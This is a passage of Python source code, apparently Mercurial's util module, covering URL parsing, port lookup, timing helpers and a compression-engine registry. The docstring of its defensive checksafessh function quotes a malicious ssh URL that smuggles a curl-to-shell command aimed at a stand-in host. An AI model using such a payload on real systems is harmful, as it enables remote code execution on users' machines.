2591 2593 """
2592 2594 fn = fn or (lambda s: s)
2593 2595 patterns = '|'.join(mapping.keys())
2594 2596 if escape_prefix:
2595 2597 patterns += '|' + prefix
2596 2598 if len(prefix) > 1:
2597 2599 prefix_char = prefix[1:]
2598 2600 else:
2599 2601 prefix_char = prefix
2600 2602 mapping[prefix_char] = prefix_char
2601 2603 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2602 2604 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2603 2605
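# A minimal sketch (hypothetical mapping and input string):
#
#   interpolate('%', {'foo': 'bar'}, 'say %foo')  # -> 'say bar'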
2604 2606 def getport(port):
2605 2607 """Return the port for a given network service.
2606 2608
2607 2609 If port is an integer, it's returned as is. If it's a string, it's
2608 2610 looked up using socket.getservbyname(). If there's no matching
2609 2611 service, error.Abort is raised.
2610 2612 """
2611 2613 try:
2612 2614 return int(port)
2613 2615 except ValueError:
2614 2616 pass
2615 2617
2616 2618 try:
2617 2619 return socket.getservbyname(port)
2618 2620 except socket.error:
2619 2621 raise Abort(_("no port number associated with service '%s'") % port)
2620 2622
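# For example (illustrative; service lookup depends on the system's
# services database):
#
#   getport(8080)    # -> 8080
#   getport('8080')  # -> 8080
#   getport('http')  # -> 80 on typical systems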
2621 2623 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2622 2624 '0': False, 'no': False, 'false': False, 'off': False,
2623 2625 'never': False}
2624 2626
2625 2627 def parsebool(s):
2626 2628 """Parse s into a boolean.
2627 2629
2628 2630 If s is not a valid boolean, returns None.
2629 2631 """
2630 2632 return _booleans.get(s.lower(), None)
2631 2633
2632 2634 _hextochr = dict((a + b, chr(int(a + b, 16)))
2633 2635 for a in string.hexdigits for b in string.hexdigits)
2634 2636
2635 2637 class url(object):
2636 2638 r"""Reliable URL parser.
2637 2639
2638 2640 This parses URLs and provides attributes for the following
2639 2641 components:
2640 2642
2641 2643 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2642 2644
2643 2645 Missing components are set to None. The only exception is
2644 2646 fragment, which is set to '' if present but empty.
2645 2647
2646 2648 If parsefragment is False, fragment is included in query. If
2647 2649 parsequery is False, query is included in path. If both are
2648 2650 False, both fragment and query are included in path.
2649 2651
2650 2652 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2651 2653
2652 2654 Note that for backward compatibility reasons, bundle URLs do not
2653 2655 take host names. That means 'bundle://../' has a path of '../'.
2654 2656
2655 2657 Examples:
2656 2658
2657 2659 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2658 2660 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2659 2661 >>> url('ssh://[::1]:2200//home/joe/repo')
2660 2662 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2661 2663 >>> url('file:///home/joe/repo')
2662 2664 <url scheme: 'file', path: '/home/joe/repo'>
2663 2665 >>> url('file:///c:/temp/foo/')
2664 2666 <url scheme: 'file', path: 'c:/temp/foo/'>
2665 2667 >>> url('bundle:foo')
2666 2668 <url scheme: 'bundle', path: 'foo'>
2667 2669 >>> url('bundle://../foo')
2668 2670 <url scheme: 'bundle', path: '../foo'>
2669 2671 >>> url(r'c:\foo\bar')
2670 2672 <url path: 'c:\\foo\\bar'>
2671 2673 >>> url(r'\\blah\blah\blah')
2672 2674 <url path: '\\\\blah\\blah\\blah'>
2673 2675 >>> url(r'\\blah\blah\blah#baz')
2674 2676 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2675 2677 >>> url(r'file:///C:\users\me')
2676 2678 <url scheme: 'file', path: 'C:\\users\\me'>
2677 2679
2678 2680 Authentication credentials:
2679 2681
2680 2682 >>> url('ssh://joe:xyz@x/repo')
2681 2683 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2682 2684 >>> url('ssh://joe@x/repo')
2683 2685 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2684 2686
2685 2687 Query strings and fragments:
2686 2688
2687 2689 >>> url('http://host/a?b#c')
2688 2690 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2689 2691 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2690 2692 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2691 2693
2692 2694 Empty path:
2693 2695
2694 2696 >>> url('')
2695 2697 <url path: ''>
2696 2698 >>> url('#a')
2697 2699 <url path: '', fragment: 'a'>
2698 2700 >>> url('http://host/')
2699 2701 <url scheme: 'http', host: 'host', path: ''>
2700 2702 >>> url('http://host/#a')
2701 2703 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2702 2704
2703 2705 Only scheme:
2704 2706
2705 2707 >>> url('http:')
2706 2708 <url scheme: 'http'>
2707 2709 """
2708 2710
2709 2711 _safechars = "!~*'()+"
2710 2712 _safepchars = "/!~*'()+:\\"
2711 2713 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2712 2714
2713 2715 def __init__(self, path, parsequery=True, parsefragment=True):
2714 2716 # We slowly chomp away at path until we have only the path left
2715 2717 self.scheme = self.user = self.passwd = self.host = None
2716 2718 self.port = self.path = self.query = self.fragment = None
2717 2719 self._localpath = True
2718 2720 self._hostport = ''
2719 2721 self._origpath = path
2720 2722
2721 2723 if parsefragment and '#' in path:
2722 2724 path, self.fragment = path.split('#', 1)
2723 2725
2724 2726 # special case for Windows drive letters and UNC paths
2725 2727 if hasdriveletter(path) or path.startswith('\\\\'):
2726 2728 self.path = path
2727 2729 return
2728 2730
2729 2731 # For compatibility reasons, we can't handle bundle paths as
2730 2732 # normal URLS
2731 2733 if path.startswith('bundle:'):
2732 2734 self.scheme = 'bundle'
2733 2735 path = path[7:]
2734 2736 if path.startswith('//'):
2735 2737 path = path[2:]
2736 2738 self.path = path
2737 2739 return
2738 2740
2739 2741 if self._matchscheme(path):
2740 2742 parts = path.split(':', 1)
2741 2743 if parts[0]:
2742 2744 self.scheme, path = parts
2743 2745 self._localpath = False
2744 2746
2745 2747 if not path:
2746 2748 path = None
2747 2749 if self._localpath:
2748 2750 self.path = ''
2749 2751 return
2750 2752 else:
2751 2753 if self._localpath:
2752 2754 self.path = path
2753 2755 return
2754 2756
2755 2757 if parsequery and '?' in path:
2756 2758 path, self.query = path.split('?', 1)
2757 2759 if not path:
2758 2760 path = None
2759 2761 if not self.query:
2760 2762 self.query = None
2761 2763
2762 2764 # // is required to specify a host/authority
2763 2765 if path and path.startswith('//'):
2764 2766 parts = path[2:].split('/', 1)
2765 2767 if len(parts) > 1:
2766 2768 self.host, path = parts
2767 2769 else:
2768 2770 self.host = parts[0]
2769 2771 path = None
2770 2772 if not self.host:
2771 2773 self.host = None
2772 2774 # path of file:///d is /d
2773 2775 # path of file:///d:/ is d:/, not /d:/
2774 2776 if path and not hasdriveletter(path):
2775 2777 path = '/' + path
2776 2778
2777 2779 if self.host and '@' in self.host:
2778 2780 self.user, self.host = self.host.rsplit('@', 1)
2779 2781 if ':' in self.user:
2780 2782 self.user, self.passwd = self.user.split(':', 1)
2781 2783 if not self.host:
2782 2784 self.host = None
2783 2785
2784 2786 # Don't split on colons in IPv6 addresses without ports
2785 2787 if (self.host and ':' in self.host and
2786 2788 not (self.host.startswith('[') and self.host.endswith(']'))):
2787 2789 self._hostport = self.host
2788 2790 self.host, self.port = self.host.rsplit(':', 1)
2789 2791 if not self.host:
2790 2792 self.host = None
2791 2793
2792 2794 if (self.host and self.scheme == 'file' and
2793 2795 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2794 2796 raise Abort(_('file:// URLs can only refer to localhost'))
2795 2797
2796 2798 self.path = path
2797 2799
2798 2800 # leave the query string escaped
2799 2801 for a in ('user', 'passwd', 'host', 'port',
2800 2802 'path', 'fragment'):
2801 2803 v = getattr(self, a)
2802 2804 if v is not None:
2803 2805 setattr(self, a, urlreq.unquote(v))
2804 2806
2805 2807 def __repr__(self):
2806 2808 attrs = []
2807 2809 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 2810 'query', 'fragment'):
2809 2811 v = getattr(self, a)
2810 2812 if v is not None:
2811 2813 attrs.append('%s: %r' % (a, v))
2812 2814 return '<url %s>' % ', '.join(attrs)
2813 2815
2814 2816 def __bytes__(self):
2815 2817 r"""Join the URL's components back into a URL string.
2816 2818
2817 2819 Examples:
2818 2820
2819 2821 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 2822 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 2823 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2822 2824 'http://user:pw@host:80/?foo=bar&baz=42'
2823 2825 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2824 2826 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 2827 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2826 2828 'ssh://user:pw@[::1]:2200//home/joe#'
2827 2829 >>> str(url('http://localhost:80//'))
2828 2830 'http://localhost:80//'
2829 2831 >>> str(url('http://localhost:80/'))
2830 2832 'http://localhost:80/'
2831 2833 >>> str(url('http://localhost:80'))
2832 2834 'http://localhost:80/'
2833 2835 >>> str(url('bundle:foo'))
2834 2836 'bundle:foo'
2835 2837 >>> str(url('bundle://../foo'))
2836 2838 'bundle:../foo'
2837 2839 >>> str(url('path'))
2838 2840 'path'
2839 2841 >>> str(url('file:///tmp/foo/bar'))
2840 2842 'file:///tmp/foo/bar'
2841 2843 >>> str(url('file:///c:/tmp/foo/bar'))
2842 2844 'file:///c:/tmp/foo/bar'
2843 2845 >>> print url(r'bundle:foo\bar')
2844 2846 bundle:foo\bar
2845 2847 >>> print url(r'file:///D:\data\hg')
2846 2848 file:///D:\data\hg
2847 2849 """
2848 2850 if self._localpath:
2849 2851 s = self.path
2850 2852 if self.scheme == 'bundle':
2851 2853 s = 'bundle:' + s
2852 2854 if self.fragment:
2853 2855 s += '#' + self.fragment
2854 2856 return s
2855 2857
2856 2858 s = self.scheme + ':'
2857 2859 if self.user or self.passwd or self.host:
2858 2860 s += '//'
2859 2861 elif self.scheme and (not self.path or self.path.startswith('/')
2860 2862 or hasdriveletter(self.path)):
2861 2863 s += '//'
2862 2864 if hasdriveletter(self.path):
2863 2865 s += '/'
2864 2866 if self.user:
2865 2867 s += urlreq.quote(self.user, safe=self._safechars)
2866 2868 if self.passwd:
2867 2869 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2868 2870 if self.user or self.passwd:
2869 2871 s += '@'
2870 2872 if self.host:
2871 2873 if not (self.host.startswith('[') and self.host.endswith(']')):
2872 2874 s += urlreq.quote(self.host)
2873 2875 else:
2874 2876 s += self.host
2875 2877 if self.port:
2876 2878 s += ':' + urlreq.quote(self.port)
2877 2879 if self.host:
2878 2880 s += '/'
2879 2881 if self.path:
2880 2882 # TODO: similar to the query string, we should not unescape the
2881 2883 # path when we store it, the path might contain '%2f' = '/',
2882 2884 # which we should *not* escape.
2883 2885 s += urlreq.quote(self.path, safe=self._safepchars)
2884 2886 if self.query:
2885 2887 # we store the query in escaped form.
2886 2888 s += '?' + self.query
2887 2889 if self.fragment is not None:
2888 2890 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2889 2891 return s
2890 2892
2891 2893 __str__ = encoding.strmethod(__bytes__)
2892 2894
2893 2895 def authinfo(self):
2894 2896 user, passwd = self.user, self.passwd
2895 2897 try:
2896 2898 self.user, self.passwd = None, None
2897 2899 s = bytes(self)
2898 2900 finally:
2899 2901 self.user, self.passwd = user, passwd
2900 2902 if not self.user:
2901 2903 return (s, None)
2902 2904 # authinfo[1] is passed to urllib2 password manager, and its
2903 2905 # URIs must not contain credentials. The host is passed in the
2904 2906 # URIs list because Python < 2.4.3 uses only that to search for
2905 2907 # a password.
2906 2908 return (s, (None, (s, self.host),
2907 2909 self.user, self.passwd or ''))
2908 2910
2909 2911 def isabs(self):
2910 2912 if self.scheme and self.scheme != 'file':
2911 2913 return True # remote URL
2912 2914 if hasdriveletter(self.path):
2913 2915 return True # absolute for our purposes - can't be joined()
2914 2916 if self.path.startswith(br'\\'):
2915 2917 return True # Windows UNC path
2916 2918 if self.path.startswith('/'):
2917 2919 return True # POSIX-style
2918 2920 return False
2919 2921
2920 2922 def localpath(self):
2921 2923 if self.scheme == 'file' or self.scheme == 'bundle':
2922 2924 path = self.path or '/'
2923 2925 # For Windows, we need to promote hosts containing drive
2924 2926 # letters to paths with drive letters.
2925 2927 if hasdriveletter(self._hostport):
2926 2928 path = self._hostport + '/' + self.path
2927 2929 elif (self.host is not None and self.path
2928 2930 and not hasdriveletter(path)):
2929 2931 path = '/' + path
2930 2932 return path
2931 2933 return self._origpath
2932 2934
2933 2935 def islocal(self):
2934 2936 '''whether localpath will return something that posixfile can open'''
2935 2937 return (not self.scheme or self.scheme == 'file'
2936 2938 or self.scheme == 'bundle')
2937 2939
2938 2940 def hasscheme(path):
2939 2941 return bool(url(path).scheme)
2940 2942
2941 2943 def hasdriveletter(path):
2942 2944 return path and path[1:2] == ':' and path[0:1].isalpha()
2943 2945
2944 2946 def urllocalpath(path):
2945 2947 return url(path, parsequery=False, parsefragment=False).localpath()
2946 2948
2947 2949 def checksafessh(path):
2948 2950 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2949 2951
2950 2952 This is a sanity check for ssh urls. ssh will parse the first item as
2951 2953 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2952 2954 Let's reject these potentially exploitable urls entirely and warn
2953 2955 the user.
2954 2956
2955 2957 Raises an error.Abort when the url is unsafe.
2956 2958 """
2957 2959 path = urlreq.unquote(path)
2958 2960 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2959 2961 raise error.Abort(_('potentially unsafe url: %r') %
2960 2962 (path,))
2961 2963
2962 2964 def hidepassword(u):
2963 2965 '''hide user credential in a url string'''
2964 2966 u = url(u)
2965 2967 if u.passwd:
2966 2968 u.passwd = '***'
2967 2969 return bytes(u)
2968 2970
2969 2971 def removeauth(u):
2970 2972 '''remove all authentication information from a url string'''
2971 2973 u = url(u)
2972 2974 u.user = u.passwd = None
2973 2975 return str(u)
2974 2976
2975 2977 timecount = unitcountfn(
2976 2978 (1, 1e3, _('%.0f s')),
2977 2979 (100, 1, _('%.1f s')),
2978 2980 (10, 1, _('%.2f s')),
2979 2981 (1, 1, _('%.3f s')),
2980 2982 (100, 0.001, _('%.1f ms')),
2981 2983 (10, 0.001, _('%.2f ms')),
2982 2984 (1, 0.001, _('%.3f ms')),
2983 2985 (100, 0.000001, _('%.1f us')),
2984 2986 (10, 0.000001, _('%.2f us')),
2985 2987 (1, 0.000001, _('%.3f us')),
2986 2988 (100, 0.000000001, _('%.1f ns')),
2987 2989 (10, 0.000000001, _('%.2f ns')),
2988 2990 (1, 0.000000001, _('%.3f ns')),
2989 2991 )
2990 2992
2991 2993 _timenesting = [0]
2992 2994
2993 2995 def timed(func):
2994 2996 '''Report the execution time of a function call to stderr.
2995 2997
2996 2998 During development, use as a decorator when you need to measure
2997 2999 the cost of a function, e.g. as follows:
2998 3000
2999 3001 @util.timed
3000 3002 def foo(a, b, c):
3001 3003 pass
3002 3004 '''
3003 3005
3004 3006 def wrapper(*args, **kwargs):
3005 3007 start = timer()
3006 3008 indent = 2
3007 3009 _timenesting[0] += indent
3008 3010 try:
3009 3011 return func(*args, **kwargs)
3010 3012 finally:
3011 3013 elapsed = timer() - start
3012 3014 _timenesting[0] -= indent
3013 3015 stderr.write('%s%s: %s\n' %
3014 3016 (' ' * _timenesting[0], func.__name__,
3015 3017 timecount(elapsed)))
3016 3018 return wrapper
3017 3019
3018 3020 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3019 3021 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3020 3022
3021 3023 def sizetoint(s):
3022 3024 '''Convert a space specifier to a byte count.
3023 3025
3024 3026 >>> sizetoint('30')
3025 3027 30
3026 3028 >>> sizetoint('2.2kb')
3027 3029 2252
3028 3030 >>> sizetoint('6M')
3029 3031 6291456
3030 3032 '''
3031 3033 t = s.strip().lower()
3032 3034 try:
3033 3035 for k, u in _sizeunits:
3034 3036 if t.endswith(k):
3035 3037 return int(float(t[:-len(k)]) * u)
3036 3038 return int(t)
3037 3039 except ValueError:
3038 3040 raise error.ParseError(_("couldn't parse size: %s") % s)
3039 3041
3040 3042 class hooks(object):
3041 3043 '''A collection of hook functions that can be used to extend a
3042 3044 function's behavior. Hooks are called in lexicographic order,
3043 3045 based on the names of their sources.'''
3044 3046
3045 3047 def __init__(self):
3046 3048 self._hooks = []
3047 3049
3048 3050 def add(self, source, hook):
3049 3051 self._hooks.append((source, hook))
3050 3052
3051 3053 def __call__(self, *args):
3052 3054 self._hooks.sort(key=lambda x: x[0])
3053 3055 results = []
3054 3056 for source, hook in self._hooks:
3055 3057 results.append(hook(*args))
3056 3058 return results
3057 3059
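# A minimal sketch (hypothetical sources) showing the lexicographic
# call order by source name:
#
#   h = hooks()
#   h.add('b-src', lambda x: x + 1)
#   h.add('a-src', lambda x: x * 2)
#   h(3)  # -> [6, 4], since 'a-src' sorts before 'b-src'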
3058 3060 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3059 3061 '''Yields lines for a nicely formatted stacktrace.
3060 3062 Skips the 'skip' last entries, then returns the last 'depth' entries.
3061 3063 Each file+linenumber is formatted according to fileline.
3062 3064 Each line is formatted according to line.
3063 3065 If line is None, it yields:
3064 3066 length of longest filepath+line number,
3065 3067 filepath+linenumber,
3066 3068 function
3067 3069
3068 3070 Not to be used in production code, but very convenient while developing.
3069 3071 '''
3070 3072 entries = [(fileline % (fn, ln), func)
3071 3073 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3072 3074 ][-depth:]
3073 3075 if entries:
3074 3076 fnmax = max(len(entry[0]) for entry in entries)
3075 3077 for fnln, func in entries:
3076 3078 if line is None:
3077 3079 yield (fnmax, fnln, func)
3078 3080 else:
3079 3081 yield line % (fnmax, fnln, func)
3080 3082
3081 3083 def debugstacktrace(msg='stacktrace', skip=0,
3082 3084 f=stderr, otherf=stdout, depth=0):
3083 3085 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3084 3086 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3085 3087 By default it will flush stdout first.
3086 3088 It can be used everywhere and intentionally does not require an ui object.
3087 3089 Not to be used in production code, but very convenient while developing.
3088 3090 '''
3089 3091 if otherf:
3090 3092 otherf.flush()
3091 3093 f.write('%s at:\n' % msg.rstrip())
3092 3094 for line in getstackframes(skip + 1, depth=depth):
3093 3095 f.write(line)
3094 3096 f.flush()
3095 3097
3096 3098 class dirs(object):
3097 3099 '''a multiset of directory names from a dirstate or manifest'''
3098 3100
3099 3101 def __init__(self, map, skip=None):
3100 3102 self._dirs = {}
3101 3103 addpath = self.addpath
3102 3104 if safehasattr(map, 'iteritems') and skip is not None:
3103 3105 for f, s in map.iteritems():
3104 3106 if s[0] != skip:
3105 3107 addpath(f)
3106 3108 else:
3107 3109 for f in map:
3108 3110 addpath(f)
3109 3111
3110 3112 def addpath(self, path):
3111 3113 dirs = self._dirs
3112 3114 for base in finddirs(path):
3113 3115 if base in dirs:
3114 3116 dirs[base] += 1
3115 3117 return
3116 3118 dirs[base] = 1
3117 3119
3118 3120 def delpath(self, path):
3119 3121 dirs = self._dirs
3120 3122 for base in finddirs(path):
3121 3123 if dirs[base] > 1:
3122 3124 dirs[base] -= 1
3123 3125 return
3124 3126 del dirs[base]
3125 3127
3126 3128 def __iter__(self):
3127 3129 return iter(self._dirs)
3128 3130
3129 3131 def __contains__(self, d):
3130 3132 return d in self._dirs
3131 3133
3132 3134 if safehasattr(parsers, 'dirs'):
3133 3135 dirs = parsers.dirs
3134 3136
3135 3137 def finddirs(path):
3136 3138 pos = path.rfind('/')
3137 3139 while pos != -1:
3138 3140 yield path[:pos]
3139 3141 pos = path.rfind('/', 0, pos)
3140 3142
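# A small illustration of the pure-Python implementations above
# (hypothetical paths):
#
#   list(finddirs('a/b/c'))  # -> ['a/b', 'a']
#   d = dirs(['a/b/c', 'a/d'])
#   'a' in d      # -> True
#   'a/b' in d    # -> True
#   'a/b/c' in d  # -> False, files themselves are not tracked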
3141 3143 # compression code
3142 3144
3143 3145 SERVERROLE = 'server'
3144 3146 CLIENTROLE = 'client'
3145 3147
3146 3148 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3147 3149 (u'name', u'serverpriority',
3148 3150 u'clientpriority'))
3149 3151
3150 3152 class compressormanager(object):
3151 3153 """Holds registrations of various compression engines.
3152 3154
3153 3155 This class essentially abstracts the differences between compression
3154 3156 engines to allow new compression formats to be added easily, possibly from
3155 3157 extensions.
3156 3158
3157 3159 Compressors are registered against the global instance by calling its
3158 3160 ``register()`` method.
3159 3161 """
3160 3162 def __init__(self):
3161 3163 self._engines = {}
3162 3164 # Bundle spec human name to engine name.
3163 3165 self._bundlenames = {}
3164 3166 # Internal bundle identifier to engine name.
3165 3167 self._bundletypes = {}
3166 3168 # Revlog header to engine name.
3167 3169 self._revlogheaders = {}
3168 3170 # Wire proto identifier to engine name.
3169 3171 self._wiretypes = {}
3170 3172
3171 3173 def __getitem__(self, key):
3172 3174 return self._engines[key]
3173 3175
3174 3176 def __contains__(self, key):
3175 3177 return key in self._engines
3176 3178
3177 3179 def __iter__(self):
3178 3180 return iter(self._engines.keys())
3179 3181
3180 3182 def register(self, engine):
3181 3183 """Register a compression engine with the manager.
3182 3184
3183 3185 The argument must be a ``compressionengine`` instance.
3184 3186 """
3185 3187 if not isinstance(engine, compressionengine):
3186 3188 raise ValueError(_('argument must be a compressionengine'))
3187 3189
3188 3190 name = engine.name()
3189 3191
3190 3192 if name in self._engines:
3191 3193 raise error.Abort(_('compression engine %s already registered') %
3192 3194 name)
3193 3195
3194 3196 bundleinfo = engine.bundletype()
3195 3197 if bundleinfo:
3196 3198 bundlename, bundletype = bundleinfo
3197 3199
3198 3200 if bundlename in self._bundlenames:
3199 3201 raise error.Abort(_('bundle name %s already registered') %
3200 3202 bundlename)
3201 3203 if bundletype in self._bundletypes:
3202 3204 raise error.Abort(_('bundle type %s already registered by %s') %
3203 3205 (bundletype, self._bundletypes[bundletype]))
3204 3206
3205 3207 # An empty bundlename means no external facing name was declared.
3206 3208 if bundlename:
3207 3209 self._bundlenames[bundlename] = name
3208 3210
3209 3211 self._bundletypes[bundletype] = name
3210 3212
3211 3213 wiresupport = engine.wireprotosupport()
3212 3214 if wiresupport:
3213 3215 wiretype = wiresupport.name
3214 3216 if wiretype in self._wiretypes:
3215 3217 raise error.Abort(_('wire protocol compression %s already '
3216 3218 'registered by %s') %
3217 3219 (wiretype, self._wiretypes[wiretype]))
3218 3220
3219 3221 self._wiretypes[wiretype] = name
3220 3222
3221 3223 revlogheader = engine.revlogheader()
3222 3224 if revlogheader and revlogheader in self._revlogheaders:
3223 3225 raise error.Abort(_('revlog header %s already registered by %s') %
3224 3226 (revlogheader, self._revlogheaders[revlogheader]))
3225 3227
3226 3228 if revlogheader:
3227 3229 self._revlogheaders[revlogheader] = name
3228 3230
3229 3231 self._engines[name] = engine
3230 3232
3231 3233 @property
3232 3234 def supportedbundlenames(self):
3233 3235 return set(self._bundlenames.keys())
3234 3236
3235 3237 @property
3236 3238 def supportedbundletypes(self):
3237 3239 return set(self._bundletypes.keys())
3238 3240
3239 3241 def forbundlename(self, bundlename):
3240 3242 """Obtain a compression engine registered to a bundle name.
3241 3243
3242 3244 Will raise KeyError if the bundle name isn't registered.
3243 3245
3244 3246 Will abort if the engine is known but not available.
3245 3247 """
3246 3248 engine = self._engines[self._bundlenames[bundlename]]
3247 3249 if not engine.available():
3248 3250 raise error.Abort(_('compression engine %s could not be loaded') %
3249 3251 engine.name())
3250 3252 return engine
3251 3253
3252 3254 def forbundletype(self, bundletype):
3253 3255 """Obtain a compression engine registered to a bundle type.
3254 3256
3255 3257 Will raise KeyError if the bundle type isn't registered.
3256 3258
3257 3259 Will abort if the engine is known but not available.
3258 3260 """
3259 3261 engine = self._engines[self._bundletypes[bundletype]]
3260 3262 if not engine.available():
3261 3263 raise error.Abort(_('compression engine %s could not be loaded') %
3262 3264 engine.name())
3263 3265 return engine
3264 3266
3265 3267 def supportedwireengines(self, role, onlyavailable=True):
3266 3268 """Obtain compression engines that support the wire protocol.
3267 3269
3268 3270 Returns a list of engines in prioritized order, most desired first.
3269 3271
3270 3272 If ``onlyavailable`` is set, filter out engines that can't be
3271 3273 loaded.
3272 3274 """
3273 3275 assert role in (SERVERROLE, CLIENTROLE)
3274 3276
3275 3277 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3276 3278
3277 3279 engines = [self._engines[e] for e in self._wiretypes.values()]
3278 3280 if onlyavailable:
3279 3281 engines = [e for e in engines if e.available()]
3280 3282
3281 3283 def getkey(e):
3282 3284 # Sort first by priority, highest first. In case of tie, sort
3283 3285 # alphabetically. This is arbitrary, but ensures output is
3284 3286 # stable.
3285 3287 w = e.wireprotosupport()
3286 3288 return -1 * getattr(w, attr), w.name
3287 3289
3288 3290 return list(sorted(engines, key=getkey))
3289 3291
3290 3292 def forwiretype(self, wiretype):
3291 3293 engine = self._engines[self._wiretypes[wiretype]]
3292 3294 if not engine.available():
3293 3295 raise error.Abort(_('compression engine %s could not be loaded') %
3294 3296 engine.name())
3295 3297 return engine
3296 3298
3297 3299 def forrevlogheader(self, header):
3298 3300 """Obtain a compression engine registered to a revlog header.
3299 3301
3300 3302 Will raise KeyError if the revlog header value isn't registered.
3301 3303 """
3302 3304 return self._engines[self._revlogheaders[header]]
3303 3305
3304 3306 compengines = compressormanager()
3305 3307
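# Illustrative usage of the registry above -- a doctest-style sketch, assuming
# the standard engines defined later in this file register cleanly:
#
#   >>> 'zlib' in compengines
#   True
#   >>> compengines.forbundlename('gzip').name()
#   'zlib'
#   >>> sorted(compengines.supportedbundletypes)
#   ['BZ', 'GZ', 'UN', 'ZS', '_truncatedBZ']
#
# Lookups such as ``forbundlename`` raise ``error.Abort`` for engines that are
# registered but unavailable, and ``KeyError`` for unknown names.
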
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
3344 3346 """
3345 3347 return None
3346 3348
3347 3349 def wireprotosupport(self):
3348 3350 """Declare support for this compression format on the wire protocol.
3349 3351
3350 3352 If this compression engine isn't supported for compressing wire
3351 3353 protocol payloads, returns None.
3352 3354
3353 3355 Otherwise, returns ``compenginewireprotosupport`` with the following
3354 3356 fields:
3355 3357
3356 3358 * String format identifier
3357 3359 * Integer priority for the server
3358 3360 * Integer priority for the client
3359 3361
3360 3362 The integer priorities are used to order the advertisement of format
3361 3363 support by server and client. The highest integer is advertised
3362 3364 first. Integers with non-positive values aren't advertised.
3363 3365
3364 3366 The priority values are somewhat arbitrary and only used for default
3365 3367 ordering. The relative order can be changed via config options.
3366 3368
3367 3369 If wire protocol compression is supported, the class must also implement
3368 3370 ``compressstream`` and ``decompressorreader``.
3369 3371 """
3370 3372 return None
3371 3373
3372 3374 def revlogheader(self):
3373 3375 """Header added to revlog chunks that identifies this engine.
3374 3376
3375 3377 If this engine can be used to compress revlogs, this method should
3376 3378 return the bytes used to identify chunks compressed with this engine.
3377 3379 Else, the method should return ``None`` to indicate it does not
3378 3380 participate in revlog compression.
3379 3381 """
3380 3382 return None
3381 3383
3382 3384 def compressstream(self, it, opts=None):
3383 3385 """Compress an iterator of chunks.
3384 3386
3385 3387 The method receives an iterator (ideally a generator) of chunks of
3386 3388 bytes to be compressed. It returns an iterator (ideally a generator)
3387 3389 of bytes of chunks representing the compressed output.
3388 3390
3389 3391 Optionally accepts an argument defining how to perform compression.
3390 3392 Each engine treats this argument differently.
3391 3393 """
3392 3394 raise NotImplementedError()
3393 3395
3394 3396 def decompressorreader(self, fh):
3395 3397 """Perform decompression on a file object.
3396 3398
3397 3399 Argument is an object with a ``read(size)`` method that returns
3398 3400 compressed data. Return value is an object with a ``read(size)`` that
3399 3401 returns uncompressed data.
3400 3402 """
3401 3403 raise NotImplementedError()
3402 3404
3403 3405 def revlogcompressor(self, opts=None):
3404 3406 """Obtain an object that can be used to compress revlog entries.
3405 3407
3406 3408 The object has a ``compress(data)`` method that compresses binary
3407 3409 data. This method returns compressed binary data or ``None`` if
3408 3410 the data could not be compressed (too small, not compressible, etc).
3409 3411 The returned data should have a header uniquely identifying this
3410 3412 compression format so decompression can be routed to this engine.
3411 3413 This header should be identified by the ``revlogheader()`` return
3412 3414 value.
3413 3415
3414 3416 The object has a ``decompress(data)`` method that decompresses
3415 3417 data. The method will only be called if ``data`` begins with
3416 3418 ``revlogheader()``. The method should return the raw, uncompressed
3417 3419 data or raise a ``RevlogError``.
3418 3420
3419 3421 The object is reusable but is not thread safe.
3420 3422 """
3421 3423 raise NotImplementedError()
3422 3424
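# A minimal conforming subclass, as a sketch (the engine and its name here
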